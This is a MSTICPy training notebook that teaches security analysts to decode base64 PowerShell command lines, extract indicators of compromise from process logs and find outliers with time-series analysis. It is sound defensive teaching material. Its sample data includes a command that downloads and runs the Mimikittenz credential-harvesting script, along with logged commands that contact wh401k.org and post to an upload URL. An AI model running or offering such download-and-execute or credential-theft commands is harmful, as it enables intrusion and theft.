## MSTICPy and Notebooks in InfoSec

---

<h1 style="border: solid; padding:5pt; color:black; background-color:#909090">Session 6 - Data analysis</h1>

---

## What this session covers:

* Data Analysis capabilities in msticpy
* Base 64 decoding
* IoC Extraction
* Outlier detection using Time Series Analysis


## Prerequisites
- Python >= 3.8 Environment
- Jupyter installed
- MSTICPy installed

## Recommended
- VS Code


---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Data Analysis capabilities in msticpy</a>

---

MSTICPy has several generic analysis and transformation functions. Some examples of transforms are:
- Process tree building
- decoding encoded and compressed data
- IoC/observable extraction from data
- Time series analysis
- syslog parsing

You can read more about the features in MSTICPy documentation.
 - [Data Analysis](https://msticpy.readthedocs.io/en/latest/DataAnalysis.html)
 - [Process Trees](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html)

---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Base 64 decoding using msticpy</a>

---

Often, Defenders have to bulk analyze the process execution commandline logs containing base64 encoded strings by decoding and analyzing them for malicious activity. 
This msticpy module allows you to extract base64 encoded content from a string or columns of Pandas DataFrame. 

Read more details - 
[Base64 Decoding and Unpacking](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html)

In [None]:
# %env MSTICPYCONFIG=./msticpyconfig.yaml
import msticpy as mp 
mp.init_notebook()
pd.set_option('display.max_colwidth', 200)

In order to find module path, you can use search feature as shows below

In [2]:
mp.search('base64')

Module,Help
msticpy.transform.base64unpack,msticpy.transform.base64unpack


Once you identified the module path, you can use either on a input string or columns of Padas dataframe.

Exmaple powershell command string with base64 encoded data. We can put this as input in next step.

`powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==`

In [3]:
cmdline = mp.nbwidgets.GetText(prompt='Enter a commandline with powershell base64 encoded', auto_display=True);

Text(value='', description='Enter a commandline with powershell base64 encoded', layout=Layout(width='50%'), s…

in order to decode, you can use `unpack` method within `base64unpack` tranform module/
The library returns following information.
- decoded string (if decodable to utf-8 or utf-16)
- hashes of the decoded segment (MD5, SHA1, SHA256)
- string of printable byte values (e.g. for submission to a disassembler)
- the detected decoded file type (limited)

In [6]:
# Decode the string
base64_dec_str = mp.transform.base64unpack.unpack(input_string=cmdline.value)

# Print decoded string
display(base64_dec_str[0])

"powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz\n</decoded>"

In [7]:
# Print decoded string
display(base64_dec_str[1]['decoded_string'][0])

"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz\n"

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 1 - Base 64 decoding using dataframe as input</a>

Perform base 64 encoding on the data loaded from previous step.
1. Choose the columns containing powershell base64 command line logs.
2. Use python help (`process_enc_logs.mp.b64unpack` or `mp.transform.base64unpack.unpack_df`)
   to find correct parameters such as input data and column name.
3. Finally display the results

<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing powershell base64 encoded logs.</li>
<li>Use data and column to specify input dataframe and column containing powershell command line</li>
<li>The final command to decode should look like one of the following.

<pre>
    # using the pandas msticpy accessor
    process_enc_logs.mp.b64extract(column='CommandLine')
</pre>

<pre>
    # using the standalone function
    mp.transform.base64unpack.unpack_df(data=process_enc_logs, column='CommandLine')
</pre>
</li>
<ul>
</ul>
</details>

In [9]:
# Load test data
process_logs = pd.read_pickle('./data/processes_on_host.pkl')
# Filter the records with powershell base 64 encoded data
process_enc_logs = process_logs[process_logs['CommandLine'].str.contains("-enc")]
process_enc_logs

Unnamed: 0,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
968,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-09 23:26:48.107,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xab5a5ac,0x1260,C:\W!ndows\System32\powershell.exe,%%1936,0x1684,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-09 23:26:48.107
7452,52b1ab41-869e-4138-9e40-2a4457f09bf0,MSTICAlertsWin1\MSTICAdmin,4688,2019-02-13 22:03:42.860,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0x1e821b5,0x61e0,C:\W!ndows\System32\powershell.exe,%%1936,0x7b20,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,C:\Windows\System32\cmd.exe,0x0,263a788b-6526-4cdc-8ed9-d79402fe4aa0,2019-02-13 22:03:42.860


In [10]:
# specify the data and column parameters
dec_df = mp.transform.base64unpack.unpack_df(data=process_enc_logs, column='CommandLine')

# display dataframe
display(dec_df)

Unnamed: 0,reference,original_string,file_name,file_type,input_bytes,decoded_string,encoding_type,file_hashes,md5,sha1,sha256,printable_bytes,src_index,CommandLine,full_decoded_string
0,"(, 1., 1)",LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,unknown,,"b'-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""'","-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""",utf-8,"{'md5': '65716544c3db642171b7597cd3deca2b', 'sha1': '8aa4c81d51732addabcaa5d8f121c79b0923189f', 'sha256': '828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8'}",65716544c3db642171b7597cd3deca2b,8aa4c81d51732addabcaa5d8f121c79b0923189f,828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8,2d 4e 6f 6e 69 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 70 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 45 78 70 72 65 73 73 69 6f 6e 20 47 65 74 2d 50 72 6f 63 65 73 7...,968,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,".\powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""</dec..."
1,"(, 1., 1)",LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,unknown,,"b'-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""'","-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""",utf-8,"{'md5': '65716544c3db642171b7597cd3deca2b', 'sha1': '8aa4c81d51732addabcaa5d8f121c79b0923189f', 'sha256': '828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8'}",65716544c3db642171b7597cd3deca2b,8aa4c81d51732addabcaa5d8f121c79b0923189f,828cce6aec56c6cc50b35041381f7d11a8d9c3cd0893625a45ed611875910fa8,2d 4e 6f 6e 69 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 70 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 45 78 70 72 65 73 73 69 6f 6e 20 47 65 74 2d 50 72 6f 63 65 73 7...,7452,.\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==,".\powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>-Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps""</dec..."


---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">IoC extraction using msticpy</a>

---

This module allows you to extract IoC patterns from a string or a DataFrame. This will be useful feature for defender for faster extraction and perform follow-up activities on those IoCs.

For more detail - [IoC Extraction](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html)

You can use this module similar fashion either by providing input string or passing a dataframe with multiple logs containing IoCs.

Enter sample command line in the next cell to see how it works. 
`netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt`

In [11]:
# netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt
cmdline = mp.nbwidgets.GetText(prompt='Enter a commandline to extract IoCs', auto_display=True);

Text(value='', description='Enter a commandline to extract IoCs', layout=Layout(width='50%'), style=TextStyle(…

You can use the `extract` method from `iocextract` class and provide input string.

In [12]:
# Find the module path
mp.search('ioc')

Module,Help
msticpy.transform.iocextract,msticpy.transform.iocextract


In [13]:
ioc_extractor = mp.transform.IoCExtract()

# any IoCs in the string?
iocs_found = ioc_extractor.extract(cmdline.value)

if iocs_found:
    print('\nPotential IoCs found in alert process:')
    display(iocs_found)


Potential IoCs found in alert process:


defaultdict(set,
            {'ipv4': {'1.2.3.4'},
             'windows_path': {'C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'}})

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 2 - Extract IoCs from log dataset</a>

Perform IoC extraction on the data loaded from previous step (process_enc_logs).
1. Choose the columns containing command line logs which may have IoCs and need to be extracted.
2. Use either of these (use Python help to find correct parameters such as input data and column name):
   - the DataFrame accessor process_enc_logs.mp.iocextract() function
   - the `extract` method of the `mp.transform.IoCextractor` class
3. Finally display the results


<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing powershell base64 encoded logs.</li>
<li>Use data and column to specify input dataframe and column containing powershell commandline</li>
<li>Use the DataFrame accessor
<pre>
    process_logs.mp.iocextract(columns='CommandLine')
</pre>
</li>
<li>Or use the IoCExtract class method
<pre>
    ioc_extractor.extract(data=process_enc_logs, columns=['CommandLine'])
</pre>
</li>
<ul>
</ul>
</details>


In [14]:
ioc_df = ioc_extractor.extract(data=process_logs, columns=['CommandLine'])

if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df[ioc_df['IoCType']=='url'])

Unnamed: 0,IoCType,Observable,SourceIndex,Input
384,url,http://wh401k.org/getps,967,".\powershell -Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps"""
678,url,http://www.401k.com/upload?pass=34592389,6091,".\regsvr32 /u /s c:\windows\fonts\csrss.exe ""http://www.401k.com/upload?pass=34592389"" post"
984,url,http://wh401k.org/getps,7451,".\powershell -Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps"""
2226,url,https://clients2.google.com/cr/report,9158,"""C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\setup.exe"" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\..."
2229,url,https://clients2.google.com/cr/report,9160,C:\Windows\TEMP\CR_42BC8.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr...


In [15]:
ioc_df = process_logs.mp.ioc_extract(columns='CommandLine')

if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df[ioc_df['IoCType']=='ipv4'])

Unnamed: 0,IoCType,Observable,SourceIndex,Input
1,ipv4,127.0.0.1,5,ping 127.0.0.1 -n 15
2,ipv4,127.0.0.1,7,ping 127.0.0.1 -n 15
3,ipv4,127.0.0.1,9,ping 127.0.0.1 -n 15
4,ipv4,127.0.0.1,11,ping 127.0.0.1 -n 15
5,ipv4,127.0.0.1,13,ping 127.0.0.1 -n 15
...,...,...,...,...
2543,ipv4,127.0.0.1,9856,ping 127.0.0.1 -n 29
2544,ipv4,127.0.0.1,9858,ping 127.0.0.1 -n 29
2570,ipv4,127.0.0.1,9891,ping 127.0.0.1 -n 18
2571,ipv4,127.0.0.1,9895,ping 127.0.0.1 -n 10


---

# <a style="border: solid; padding:5pt; color:black; background-color:#909090">Time Series analysis using msticpy</a>

---

MSTICPy has functions to calculate and display time series decomposition results. These can be useful to spot time-based anomalies in something that has a predictable seasonal pattern

Fore more details , check the documentation
[Time Series Analysis](https://msticpy.readthedocs.io/en/latest/visualization/TimeSeriesAnomalies.html)

In [11]:
mp.search('timeseries')

Module,Help
msticpy.analysis.timeseries,msticpy.analysis.timeseries
msticpy.vis.timeseries,msticpy.vis.timeseries


MSTICPy has a number of built-in queries for MS Sentinel to support time series analysis.

- MultiDataSource.get_timeseries_anomalies
- MultiDataSource.get_timeseries_data
- MultiDataSource.get_timeseries_decompose
- MultiDataSource.plot_timeseries_datawithbaseline
- MultiDataSource.plot_timeseries_scoreanomolies

To use these you will need to connect to sentinel workspace

`# Authentication
qry_prov = mp.QueryProvider("MSSentinel")
qry_prov.connect(mp.WorkspaceConfig(workspace="cybersecuritysoc"))`

An example of running the query against connected sentinel workspace and retrieve the time series data.

```
#Specify start and end timestamps
start='2022-09-01 00:00:00.000000'
end='2020-10-01 00:00:00.000000'

#Execute the query by passing required and optional parameters
time_series_data = qry_prov.MultiDataSource.get_timeseries_data(
    start=start,
    end=end,
    table="CommonSecurityLog",
    timestampcolumn="TimeGenerated",
    aggregatecolumn="SentBytes",
    groupbycolumn="DeviceVendor",
    aggregatefunction="sum(SentBytes)",
    where_clause='| where DeviceVendor=="Fortinet"',
    add_query_items='| mv-expand TimeGenerated to typeof(datetime), SentBytes to typeof(long)',
)
#display the output
time_series_data
```

## <a style="border: solid; padding:5pt; color:black; background-color:#309030">Task 3 - Find outliers using time series analysis on network data</a>

Perform Time series analysis on the sample data loaded in the first step.
1. from the loaded dataframe, use python help (`ts_df.mp_timeseries.analyze`) to find correct parameters such as data_column, seasonal parameteres if known otherwise keep default.
3. Finally plot the time series of the results from previous steps using `ts_decomp_df.mp_timeseries.plot`

<br>
<details>
<summary>Hints...</summary>
<li>Use the cell below to identify the columns containing time series numerical data.</li>
<li>The final command to do time series should look like:
<pre>
    ts_df.mp_timeseries.analyze(
        # time_column="TimeGenerated"  - if the DF is not indexed by timestamp
        data_column="TotalBytesSent",
        seasonal=7,
        period=24
    )
</pre>
</li>
<li>You can also plot the results and outliers using the command.
<pre>
    ts_decomp_df.mp_timeseries.plot(
        y="TotalBytesSent",
    );
</pre>
</li>
<ul>
</ul>
</details>

In [2]:
# Load test data
import pandas as pd
ts_df = pd.read_pickle('./data/timeseries.pkl')
ts_df

Unnamed: 0_level_0,TotalBytesSent
TimeGenerated,Unnamed: 1_level_1
2020-07-06 00:00:00+00:00,10823
2020-07-06 01:00:00+00:00,14821
2020-07-06 02:00:00+00:00,13532
2020-07-06 03:00:00+00:00,11947
2020-07-06 04:00:00+00:00,11193
...,...
2020-07-12 19:00:00+00:00,18166
2020-07-12 20:00:00+00:00,13830
2020-07-12 21:00:00+00:00,13350
2020-07-12 22:00:00+00:00,11842


In [3]:
#load the module
from msticpy.analysis import timeseries

# analyze the time series data and find outliers
ts_decomp_df = ts_df.mp_timeseries.analyze(
    data_column="TotalBytesSent",
    seasonal=7,
    period=24
)

In [4]:
# plot the results retrieved from previous step.
ts_decomp_df.mp_timeseries.plot(
    y="TotalBytesSent",
);

---
# End of Session
